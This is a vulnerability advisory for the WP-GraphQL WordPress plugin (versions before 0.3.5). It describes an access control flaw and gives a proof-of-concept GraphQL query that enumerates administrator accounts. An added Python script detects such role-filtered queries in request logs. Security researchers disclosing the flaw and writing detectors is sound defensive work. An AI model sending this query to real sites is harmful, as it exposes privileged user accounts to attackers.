WordPress Plugin Vulnerabilities
WP-GraphQL < 0.3.5 - Improper Access Control
Description
The plugin doesn't properly restrict access to information about other users' roles on the affected site. Because of this, a remote attacker could forge a GraphQL query to retrieve the account roles of every user on the site.
Proof of Concept
query getUsers {
  users(where: {role: ADMINISTRATOR}) {
    edges {
      node {
        userId
        name
      }
    }
  }
}
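A defender-side check for the query shape above, as an added example that is not part of the original advisory: it scans logged GraphQL request bodies for `users` queries that filter by `role`. The log record layout (`client`, `body`), the sample lines and the `RoleEnum` type name are constructed assumptions.

```python
import json
import re

# A `users(...)` field whose argument list carries a `role:` filter, tolerating
# extra whitespace and either an enum literal or a $variable reference.
_USERS_ARGS = re.compile(r"\busers\s*\(([^)]*)\)", re.S)
_ROLE_ARG = re.compile(r"\brole\s*:\s*(\$?[A-Za-z_][A-Za-z0-9_]*)")
_COMMENT = re.compile(r"#[^\n]*")  # GraphQL comments run to end of line


def role_filters(query, variables=None):
    """Return the role values used to filter `users` in a GraphQL query string."""
    variables = variables if isinstance(variables, dict) else {}
    roles = []
    for args in _USERS_ARGS.findall(_COMMENT.sub("", query)):
        for value in _ROLE_ARG.findall(args):
            if value.startswith("$"):  # resolve variables sent with the request
                value = str(variables.get(value[1:], value))
            roles.append(value.upper())
    return roles


def flag_requests(log_lines):
    """Return (client, roles) for each logged body that filters users by role."""
    hits = []
    for line in log_lines:
        record = json.loads(line)
        try:
            body = json.loads(record["body"])
        except (KeyError, ValueError):
            continue  # not a JSON GraphQL request
        if isinstance(body, dict) and isinstance(body.get("query"), str):
            roles = role_filters(body["query"], body.get("variables"))
            if roles:
                hits.append((record["client"], roles))
    return hits


def _rec(client, body):  # helper to build constructed sample records
    return json.dumps({"client": client, "body": body})

# Constructed sample log (not real traffic); `RoleEnum` is a placeholder type name.
SAMPLE_LOG = [
    _rec("198.51.100.7", json.dumps({"query": "query getUsers{ users(where:{role:ADMINISTRATOR}){ edges{ node{ userId name } } } }"})),
    _rec("198.51.100.7", json.dumps({"query": "query q($r: RoleEnum){ users( where : { role : $r } ){ edges{ node{ name } } } }", "variables": {"r": "editor"}})),
    _rec("203.0.113.20", json.dumps({"query": "{ posts { edges { node { title } } } }"})),
    _rec("203.0.113.21", "not json"),
]

if __name__ == "__main__":
    for client, roles in flag_requests(SAMPLE_LOG):
        print(client, "filtered users by role:", ", ".join(roles))
```

The matcher is regex-based rather than a full GraphQL parser, so treat hits as leads to review against the site's expected clients.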
Affects Plugins
References
Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Rohan Pagey
Submitter
Rohan Pagey
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2019-07-10
Added
2022-05-02
Last Updated
2022-05-03